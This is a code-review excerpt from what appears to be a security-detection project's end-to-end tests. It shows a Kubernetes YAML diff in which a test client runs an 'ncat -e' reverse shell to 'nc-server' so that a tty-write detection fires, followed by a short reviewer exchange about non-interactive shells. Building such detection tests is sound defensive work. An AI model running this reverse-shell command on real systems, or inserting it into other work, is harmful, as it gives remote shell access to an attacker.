e2e/nc-server-client.yaml

```diff
@@ -67,7 +67,18 @@ spec:
       containers:
         - name: client
           image: busybox
+          # Should trigger tty write.
           command:
-            - sleep
-            - infinity
+            - /bin/sh
+            - -c
+            - |-
+              ncat -e `/bin/sh -i` nc-server 8000
```

Comment:
Could we maybe also add a test case for a non interactive shell?

Reply:
This test should catch tty write. For other case with socket dup there is a another deployment below with python.